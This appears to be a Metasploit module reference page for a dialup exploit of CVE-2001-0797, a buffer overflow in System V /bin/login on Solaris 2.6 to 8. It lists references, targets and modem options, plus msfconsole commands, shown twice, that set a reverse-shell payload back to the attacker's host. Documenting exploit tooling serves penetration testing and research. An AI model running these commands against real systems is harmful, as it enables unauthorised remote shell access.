System V Derived /bin/login Extraneous Arguments Buffer Overflow
This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.
Exploit Rank
- Good
Exploit Authors
- I)ruid < druid [at] caughq.org >
Vulnerability References
- CVE-2001-0797
- OSVDB-690
- OSVDB-691
- BID-3681
- http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html
- http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html
Exploit Targets
- 0 - Solaris 2.6 - 8 (SPARC) (default)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/dialup/multi/login/manyargs
msf exploit(manyargs) > show payloads
msf exploit(manyargs) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(manyargs) > set LHOST [MY IP ADDRESS]
msf exploit(manyargs) > set NUMBER [STRING]
msf exploit(manyargs) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/dialup/multi/login/manyargs
msf exploit(manyargs) > show payloads
msf exploit(manyargs) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(manyargs) > set LHOST [MY IP ADDRESS]
msf exploit(manyargs) > set NUMBER [STRING]
msf exploit(manyargs) > exploit
Exploit Module Options
| BAUDRATE | Baud Rate (default: 19200) |
| DATABITS | Data Bits (4 is Windows Only) (accepted: 4, 5, 6, 7, 8) (default: 8) |
| DIALPREFIX | Dial Prefix (default: ATDT *67, *70,) |
| DIALSUFFIX | Dial Suffix |
| DIALTIMEOUT | Dial Timeout in seconds (default: 60) |
| DISPLAYMODEM | Displays modem commands and responses on the console |
| FLOWCONTROL | Flow Control (accepted: None, Hardware, Software, Both) (default: None) |
| INITSTRING | Initialization String (default: AT X6 S11=80) |
| NUMBER | Number to Dial (e.g. 1.800.950.9955, (202) 358-1234, 358.1234 etc.) |
| PARITY | Parity (Mark & Space are Windows Only) (accepted: None, Even, Odd, Mark, Space) (default: None) |
| SERIALPORT | Serial Port (e.g. 0 (COM1), 1 (COM2), /dev/ttyS0, etc.) (default: /dev/ttyS0) |
| STOPBITS | Stop Bits (accepted: 1, 2) (default: 1) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |